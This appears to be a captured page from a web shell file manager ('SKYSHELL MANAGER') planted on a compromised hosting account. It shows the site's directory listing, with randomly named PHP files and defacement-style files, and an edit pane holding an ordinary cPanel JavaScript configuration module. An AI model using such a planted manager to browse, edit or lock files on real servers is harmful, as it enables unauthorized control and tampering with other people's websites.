📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: componentConfiguration.js
/* # cjt/config/componentConfiguration.js Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited */ /* global define: false */ define( [ // Libraries "angular", "cjt/core", "cjt/util/locale" ], function(angular, CJT, LOCALE) { "use strict"; /** * @typedef {Object} ComponentConfiguration * @description Base class for all configuration objects. * @property {String} component Name of the component associated with the configuration */ /** * @typedef {ComponentConfiguration} AlertListConfiguration * @property {string} position - one of the following: * top-right * top-middle * top-left * bottom-right * bottom-middle * bottom-left * middle-right * middle-middle * middle-left * @property {boolean} inline - if false, the alert list will use the position rule, otherwise, it will appear where it naturally flows in the html. */ /** * @typedef {Object} ComponentConfigurations * @property {AlertListConfiguration} alertList */ /** * Generates the default render rules which are used if the user * has not set a preference about where their alerts render, or if * there is an error retrieving the user's render rules. * * @method _defaultComponentConfiguration * @private * @return {ComponentConfiguration} default display properties for the various UI components. */ function _defaultComponentConfiguration() { return { alertList: { component: "alertList", position: !LOCALE.is_rtl() ? "top-right" : "top-left", inline: false } }; } /** * Get the component's configuration * @method _getComponent * @private * @param {ComponentConfigurations} config Configuration for all components * @param {String} [component] Name of the component. * @return {ComponentConfiguration|ComponentConfigurations} */ function _getComponent(config, component) { if (!component) { return config; } else if (component in config) { return config[component]; } else { throw new Error("The component " + component + " is not available in the configuration."); } } /** * Set the value of a component's configuration. Only components defined in * the default configuration may be set. * * @method _setComponent * @param {ComponentConfigurations} config Configuration for all components * @param {String} component Name of the component. * @param {ComponentConfiguration} value */ function _setComponent(config, component, value) { if (!component) { throw new Error("You must provide a component name when setting a component"); } var defaultConfig = _defaultComponentConfiguration(); if (component in defaultConfig) { if (!value) { config[component] = defaultConfig[component]; } else { value.component = component; config[component] = value; } } else { throw new Error("The component " + component + " is not available in the configuration."); } } var module = angular.module("cjt2.config.componentConfiguration", []); module.provider("componentConfiguration", function() { var config = _defaultComponentConfiguration(); return { /** * Get a named component of the display configuration. * * @method getComponent * @param {String} [component] Name of the component. If not provided the whole configuration is returned * @return {Any} Data for the component. Varies depending on what component was requested. If no component is passed, the whole configuration is returned. * @throws {Error} If the component name is not available in the configuration. */ getComponent: function(component) { return _getComponent(config, component); }, /** * Sets the value for a component for the display configurtion * * @method setComponent * @param {String} component Name of the component. * @param {Any} value Data for the component. Varies depending on what component was requested. */ setComponent: function(component, value) { _setComponent(config, component, value); }, /** * Gets the complete display configuration. * * @method get * @return {Object} Object whose properties are the display configuration properties for various components. */ get: function() { return config; }, /** * Sets the complete display configuration. * * @method set * @param {Object} value An object whose keys represent the various component display properties. */ set: function(value) { config = value; }, /** * @method $get * @return {componentConfigurationService} [description] */ $get: function() { /** * @classdesc The display properties used by shared components. * @name componentConfigurationService * @class */ return { /** * Gets a specific component from the configuration * * @method getComponent * @param {String} [component] Component name, if not passed, will get the whole configuration. * @return {ComponentConfiguration|AlertListConfiguration} The configuration data for the component or the whole configuration. */ getComponent: function(component) { return _getComponent(config, component); }, /** * Gets the complete configuration. * * @method get * @return {ComponentConfiguration} The configuration data for the component or the whole configuration. */ get: function() { return config; }, /** * Sets the value for a component for the display configurtion * * @method setComponent * @param {String} component Name of the component. * @param {Any} value Data for the component. Varies depending on what component was requested. * @throws Will throw an error if component name is not provided OR if component is not available in the configuration. */ setComponent: function(component, value) { return _setComponent(config, component, value); }, /** * Gets the default configuration so callers can see what changed in the component setup. * * @method getDefaults * @return {ComponentConfigurations} All default component configurations */ getDefaults: function() { var config = _defaultComponentConfiguration(); /** * Gets a specific component from the default configuration * * @method getComponent * @param {String} [component] Component name, if not passed, will get the whole configuration. * @return {ComponentConfiguration|AlertListConfiguration} The configuration data for the component or the whole configuration. */ config.getComponent = function(component) { return _getComponent(config, component); }; /** * Gets the complete default configuration. * * @method get * @return {ComponentConfiguration} The configuration data for the component or the whole configuration. */ config.get = function() { return config; }; return config; } }; } }; }); } );
Save